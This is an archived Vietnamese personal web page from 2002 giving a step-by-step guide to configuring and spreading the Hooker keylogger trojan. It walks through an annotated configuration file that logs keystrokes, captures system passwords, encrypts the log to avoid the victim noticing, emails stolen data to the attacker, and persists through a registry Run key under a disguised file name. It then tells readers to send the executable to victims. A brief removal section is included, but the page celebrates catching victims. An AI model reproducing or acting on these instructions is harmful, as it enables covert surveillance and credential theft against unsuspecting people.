<body><!--'"</title></head>--> <script type="text/javascript"> ////// Compete ///////////////////// __compete_code = '667f89f26d96c30e99728fe6a608804d'; (function () { var s = document.createElement('script'), d = document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0], t = 'https:' == document.location.protocol ? 'https://c.compete.com/bootstrap/' : 'http://c.compete.com/bootstrap/'; s.src = t + __compete_code + '/bootstrap.js'; s.type = 'text/javascript'; s.async = 'async'; if (d) { d.appendChild(s); } //console.log(">>>", $('div.adCenterClass').get(0)); })(); ////// Quantcast ///////////////////// function channValidator(chann) { return (typeof(chann) == 'string' && chann != ''); } function lycosQuantcast(){ var lb = ""; if(typeof(cm_host) !== 'undefined' && channValidator(cm_host)){ lb += cm_host.split('.')[0] + '.'; } if(typeof(cm_taxid) !== 'undefined' && channValidator(cm_taxid)){ lb += cm_taxid; lb = lb.replace('/',''); } else { lb = lb.replace('.',''); } return lb; } var _qevents = _qevents || []; (function() { var elem = document.createElement('script'); elem.src = (document.location.protocol == "https:" ? "https://secure" :"http://edge") + ".quantserve.com/quant.js"; elem.async = true; elem.type = "text/javascript"; var scpt = document.getElementsByTagName('script')[0]; scpt.parentNode.insertBefore(elem, scpt); })(); _qevents.push({ qacct:"p-6eQegedn62bSo", labels:lycosQuantcast() }); /////// Google Analytics var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-21402695-21']); _gaq.push(['_setDomainName', 'angelfire.com']); _gaq.push(['_setCustomVar', 1, 'member_name', 'blues/buisyhaidang', 3]); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); ////// Lycos Initialization ///////////////////// var lycos_ad = Array(); var lycos_search_query = ""; var lycos_onload_timer; var cm_role = "live"; var cm_host = "angelfire.lycos.com"; var cm_taxid = "/memberembedded"; var angelfire_member_name = "blues/buisyhaidang"; var angelfire_member_page = "blues/buisyhaidang/cac_bai_viet/trojan1.htm"; var angelfire_ratings_hash = "1444381216:a14b3158bf741ebe2e40c35be5f6ea9c"; var lycos_ad_category = {"dmoz":"health\/addictions","ontarget":"&CAT=health&L2CAT=diseases%20and%20conditions&L3CAT=substance%20abuse","find_what":"paris"}; var lycos_ad_remote_addr = ""; var lycos_ad_www_server = "www.angelfire.lycos.com"; var edit_site_url = "www.angelfire.lycos.com/landing/landing.tmpl?utm_source=house&utm_medium=landingpage&utm_campaign=toolbarlink"; ////// Criteo ///////////////////// var cto_conf = { a:true, i: "294", c:"img", kw: "" } ; (function (){ var c = document.createElement("script"); c.type = "text/javascript"; c.async = true; c.src = "http://www.angelfire.com/adm/js/partner/criteo_ld_kw.js"; var s = document.getElementsByTagName("body")[0]; s.appendChild(c); })(); </script> <script type="text/javascript" src="http://scripts.lycos.com/catman/init.js"></script> <script type="text/javascript"> (function(isV) { if (!isV) { return; } //this.lycos_search_query = lycos_get_search_referrer(); var adMgr = new AdManager(); var lycos_prod_set = adMgr.chooseProductSet(); var slots = ["leaderboard", "leaderboard2", "toolbar_image", "toolbar_text", "smallbox", "top_promo", "footer2","slider"]; var adCat = this.lycos_ad_category; adMgr.setForcedParam('page', (adCat && adCat.dmoz) ? adCat.dmoz : 'member'); if (this.lycos_search_query) { adMgr.setForcedParam("keyword", this.lycos_search_query); } else if (adCat && adCat.find_what) { adMgr.setForcedParam('keyword', adCat.find_what); } for (var s in slots) { var slot = slots[s]; if (adMgr.isSlotAvailable(slot)) { this.lycos_ad[slot] = adMgr.getSlot(slot); } } adMgr.renderHeader(); adMgr.renderFooter(); }((function() { var w = 0, h = 0, minimumThreshold = 300; if (top == self) { return true; } if (typeof(window.innerWidth) == 'number' ) { w = window.innerWidth; h = window.innerHeight; } else if (document.documentElement && (document.documentElement.clientWidth || document.documentElement.clientHeight)) { w = document.documentElement.clientWidth; h = document.documentElement.clientHeight; } else if (document.body && (document.body.clientWidth || document.body.clientHeight)) { w = document.body.clientWidth; h = document.body.clientHeight; } return ((w > minimumThreshold) && (h > minimumThreshold)); }()))); window.onload = function() { var f = document.getElementById("lycosFooterAd"); var b = document.getElementsByTagName("body")[0]; b.appendChild(f); f.style.display = "block"; document.getElementById('lycosFooterAdiFrame').src = '/adm/ad/footerAd.iframe.html'; // Slider Injection (function() { var e = document.createElement('iframe'); e.style.border = '0'; e.style.margin = 0; e.style.display = 'block'; e.style.cssFloat = 'right'; e.style.height = '254px'; e.style.overflow = 'hidden'; e.style.padding = 0; e.style.width = '300px'; })(); // Bottom Ad Injection ( function() { var b = document.getElementsByTagName("body")[0]; var iif = document.createElement('iframe'); iif.style.border = '0'; iif.style.margin = 0; iif.style.display = 'block'; iif.style.cssFloat = 'right'; iif.style.height = '254px'; iif.style.overflow = 'hidden'; iif.style.padding = 0; iif.style.width = '300px'; iif.src = '/adm/ad/injectAd.iframe.html'; var cdiv = document.createElement('div'); cdiv.style = "width:300px;margin:10px auto;"; cdiv.appendChild( iif ); if( b ) { b.insertBefore(cdiv, b.lastChild); } })(); } </script> <style> #body .adCenterClass{margin:0 auto} </style> <div style="background:#abe6f6; border-bottom:1px solid #507a87; position:relative; z-index:9999999"> <!-- Search Box --> <!--<form name="search" onSubmit="return searchit()" id='header_search' > <input type="text" placeholder="Search" size=30 name="search2" value=""> <input type="button" value="Go!" onClick="searchit()"> </form> <style> form#header_search { width: 916px; margin: 0 auto 8px; position: relative; } form#header_search input { height: 40px; font-size: 14px; line-height: 40px; padding: 0 8px; box-sizing: border-box; background: #F4F2E9; border: 1px solid #BBB8B8; transition: background-color 300ms ease-out, color 300ms ease; } form#header_search input[type="text"] { width: 100%; } form#header_search input[type="text"]:focus { border-color: #A2D054; background-color: #fff; box-shadow: 0 0px 12px -4px #A2D054; } form#header_search input[type="button"] { position: absolute; top: 1px; right: 1px; opacity: 1; background: #DFDCCF; color: #463734; width: 125px; cursor: pointer; height: 38px; border: none; } form#header_search input[type="text"]:focus ~ input[type='button']:hover, form#header_search input[type='button']:hover { background-color: #A5CE56; color: #fff; } form#header_search input[type="text"]:focus ~ input[type='button'] { background-color: #52AEDF; color: #fff; } </style> <script> function searchit(){ // determine environment var search_env if (lycos_ad_www_server.indexOf(".pd.") > -1) { search_env = 'http://search52.pd.lycos.com/a/'; } else if (lycos_ad_www_server.indexOf(".qa.") > -1) { search_env = 'http://search52.qa.lycos.com/a/'; } else { search_env = 'http://search52.lycos.com/a/'; } var search_term = encodeURIComponent(document.search.search2.value) var search_url = search_env+search_term; window.open(search_url); return false } </script--> <!--end search box --> <div class="adCenterClass" style="display:block!important; overflow:hidden; width:916px;"> <a href="http://www.angelfire.lycos.com/" title="Angelfire.com: build your free website today!" style="display:block; float:left; width:186px; border:0"> <img src="/adm/ad/angelfire-freeAd.jpg" alt="Site hosted by Angelfire.com: Build your free website today!" style="display:block; border:0" /> </a> <script type="text/javascript">document.write(lycos_ad['leaderboard']);</script> </div> </div> <!-- ///////////////////////////////////// --> <script type="text/javascript">document.write(lycos_ad['slider']);</script> <div id="lycosFooterAd" style="background:#abe6f6; border-top:1px solid #507a87; clear:both; display:none; position:relative; z-index:9999999"> <div class="adCenterClass" style="display:block!important; overflow:hidden; width:936px;"> <div id="aflinksholder" style="float:left; width:186px;"> <a href="http://www.angelfire.lycos.com/" title="Angelfire.com: build your free website today!" style="display:block; border:0"> <img src="/adm/ad/angelfire-freeAd2.jpg" alt="Site hosted by Angelfire.com: Build your free website today!" style="display:block; border:0" /> </a> <div style="text-align:center"> <span style="color:#393939!important; font-size:12px!important; position:relative; top:-6px"> Sponsored by </span> <a href="http://www.listen.com/disty/index.jsp?from=lycos" target="_blank"> <img src="http://af.lygo.com/d/toolbar/sponsors/rhapsody_logo.jpg" alt="sponsor logo" title="Rhapsody"/> </a> </div> </div> <iframe id="lycosFooterAdiFrame" style="border:0; display:block; float:left; height:96px; overflow:hidden; padding:0; width:750px"></iframe> </div> </div> <noscript> <img src="http://www.angelfire.com/doc/images/track/ot_noscript.gif?rand=653446" alt="" width="1" height="1" /> <!-- BEGIN STANDARD TAG - 728 x 90 - Lycos - Angelfire Fallthrough - DO NOT MODIFY --> <iframe frameborder="0" marginwidth="0" marginheight="0" scrolling="no" width="728" height="90" src="http://ad.yieldmanager.com/st?ad_type=iframe&amp;ad_size=728x90&amp;section=280303"></iframe> <!-- END TAG --> </noscript> <!-- Start Ybrant tracker --> <img src="http://ad.yieldmanager.com/pixel?id=1901600&t=2" width="1" height="1" /> <!-- End Ybrant tracker --> <!-- Start Datonics --> <script type="text/javascript" src="http://ads.pro-market.net/ads/scripts/site-132783.js"></script> <!-- End Datonics --> <!-- Start Chango --> <script type="text/javascript"> var __cho__ = {"pid":1694}; (function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true; c.src = document.location.protocol + '//cc.chango.com/static/o.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(c, s); })(); </script> <!-- End Chango --> <body>

Hooker trojan

Hà, đưa các bài này lên chỉ sợ rằng đến một lúc nào đó chính ḿnh cũng bị dính chưởng. Nhưng chúng ta ai cũng giấu kiến thức của ḿnh th́ làm sao cùng đi lên được phải không?

Các để mục:

Hooker Trojan - Hướng dẫn sử dụng và cách chữa trị khi bị lây nhiễm


I. Hướng dẫn sử dụng

1. Download con Hookertrojan này về rồi giải nén tệp hooker.zip ra một thư mục bất kỳ.(dĩ nhiên) Trước khi sử dụng bạn phải tắt hết các chương tŕnh antivirus v́ bản thân trojan cũng là một loại "virus" bị các chương tŕnh AV nhận diện. (nhưng nếu bạn dùng BKAV th́ không "chấp") .

2. Dùng notepad để soạn thảo và sửa đổi các thông tin trong tệp HKCONF.INI cho giống như sau:

Nội dung tệp HKCONF.INI. Chú ư: những phần chú thích tôi in đậm bạn nên để ư và vận dụng. Những mục tôi gạch chận bạn sửa đổi lại cho phù hợp. C̣n các mục khác tham khảo thôi. Không cần thiết. Để nguyên như thế vẫn hoạt động tốt v́ tôi đă sửa và chạy tốt rồi


;* *
;* Hooker v2.4, hkconf.ini file *
;* ACrazzi, 1999 *
;* *

;if key is not defined, it will be assumed as 0 or ""

;common parameters

total = 1 ;keylog all time?{Trojan sẽ ghi lại những ǵ victim gơ vào nếu set=1}

full = 0 ;log windows, where no keys was pressed?

adv = 0 ;log advanced keys?{Có ghi lại những phím mở rộng hay không}

encrypt = 0 ;ecrypt log?{Mă hóa tệp log hay không. Chọn mă hóa để đề pḥng victim phát hiện}

mail = 1 ;send log via email?{Gửi những thông tin trojan lấy được qua email?}

syspass = 1 ;include system passwords in log?{Lấy pass đăng nhập hệ thống?}

kill = 1 ;kill itself?{Cho phép trojan tự hủy sau một khoảng thời gian nào đó?}

fullname = 0 ;full exename in registry?{Đăng kư tên tệp lây nhiễm vào registry với tên đầy đủ?}

exepath = 0 ;where?{Nơi tệp lây nhiễm được cài vào}
;0 - windows
;1 - windows\system
;2 - user defined

ras = 1 ;detect RAS? if computer is in lan, set to 0{Nếu máy victim truy nhập internet thông qua mạng Lan (máy dịch vụ) th́ set = 0, máy đơn (được gắn trực tiếp vào moderm) set = 1}

loglimit = 50000 ;log will be no longer than this{Giới hạn kích thước file log}

sendafter = 10000 ;force send log by mail after this size{Nếu file log lớn hơn cỡ này th́ sent mail}

nss = 6 ;number of substrings to search (max - 40)

port = 25 ;sendmail's port{Cổng gửi mail}

;log filename{Tên file log}

;sendmail host{Server bạn dùng để gửi mail}
host=mail.hn.vnn.vn{Tôi hay dùng cái này}

;mailfrom - required for some servers
mailfrom=hooker@hn.vnn.vn{Tên mà trojan lấy khi gửi mail cho bạn - chú ư tên server và phần đuôi của email này nên đặt giống nhau}

;mailto - your email{Địa chỉ email mà bạn muốn nhận thông tin từ trojan}

;subject of message
subj=Tin moi day, tin moi day...{Tiêu đề của email mà trojan sẽ gửi cho bạn}

;this file will be downloaded by http in %windir%/system directory
;and will be ran from there. default port is 80, if you want to
;define another port - type like that: www.addr.com/file:8080
;if there is newer file on web, it will be redl-ed.
;hooker checks every 30 minutes...

;registry path
reg_path=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce{Đường dẫn trong register}

;description in registry
reg_desc=TaskMem{Tên mô tả trong registry - Nên giữ nguyên tên này v́ nó rất hay}

;name of exec
exename=MSCR56.exe{Tên file lây nhiễm}

;name of keylog dll. i recommend to give unique name every time(Tên file dùng cho việc keylog)

;timespan to send messages{Khoảng thời gian trojan gửi thông tin cho bạn. Nên chọn là 1 ngày v́ nếu không hộp thư của bạn chẳng mấy chốc mà đầy}
second = 0 
minute = 0 
hour = 0 
day = 1 

;time to live after installation{Khoảng thời gian trojan tồn tại trên máy victim - nếu bạn nhân đạo th́ đặt nó in ít thôi, he he he}
second = 0 
minute = 0 
hour = 0 
day = 3650 

;substrings to search in windows' titles


Sau khi thiết lập các thông số, bạn chạy file hooker.bat để lưu lại thông tin vào trong file hooker.exe. File hooker.exe này bạn có thể gửi cho victim, dính vào mail hoặc vào web, miến là làm thế nào để nó chạy được trên máy đối thủ là xong. Bạn chỉ việc ngồi chờ thông tin mà con ngựa trojan này gửi về thôi.

II. Nguyên lư hoạt động của trojan

Khi victim chạy file hooker.exe th́ nó sẽ tạo ra hai file là MSCR56.exe{Tên file lây nhiễm} tại thư mục bạn đă chỉ định và file kernel.dll (hoặc keyripper.dll) trong thư mục windows\system và thêm vào registry của windows khóa sau: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (Đồng thời tự xóa luôn bản thân nó - file hooker.exe để xóa dấu vết) Tác dụng của khóa này là kích hoạt trojan mỗi lần khởi động máy. Khi được kích hoạt rồi, nó sẽ làm việc như một chương tŕnh thường trú (chương tŕnh nền) và ghi lại tất cả những ǵ bạn yêu cầu. Khi victim online, lập tức nó sẽ gửi những thông tin đă thu được trong file hsys.log tới địa chỉ email của bạn.

III. Cách xử lư khi bị lây nhiễm

Bạn hoàn toàn có thể dùng một chương tŕnh diệt virus thông dụng và là loại antivirus mạnh nhất hiện nay đó là NAV để diệt nó. Nếu không bạn có thể xử lư nó như sau: Vào start --> find t́m 2 files MSCR56.exe kernel.dll (hoặc keyripper.dll) xóa nó đi. Sau đó vào start --> Run, gơ vào đó regedit và enter. Trên cây registry t́m tới mục HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run và xóa khóa có nội dung là tệp MSCR56.exe. Khởi động lại máy là xong. Tất nhiên những điều này chỉ chung chung là thế c̣n nếu trojan đă được thiết lập khác th́ tên hai file kia có thể khác đi. Tốt hơn cả là bạn nên dùng NAV để diệt nó. Chú ư là bạn không thể sửa các file mà NAV phát hiện và thông báo là đă bị nhiễm virus bởi v́ đó là các files của trojan. Hăy chọn delete. Nếu chẳng may trong khi bạn sử dụng trojan này mà bị lây nhiễm th́ hăy mở tệp HKCONF.INI và t́m các thông số trong đó để có thể kiểm soát con trojan này.

IV. Chúc các bạn thành công và chăn được nhiều "gà". He he he...


Tất cả các trang đều sử dụng font Arial với mă Unicode.Nếu bạn thấy chữ tiếng Việt hiển thị chưa đúng xin hăy download tại đây. Độ phân giải màn h́nh tốt nhất: 800x600. Nếu bạn có ư kiến đóng góp xin gửi mail cho tôi theo địa chỉ: webmaster@buisyhaidang.com

Ngày cập nhật cuối cùng: 24-09-2002.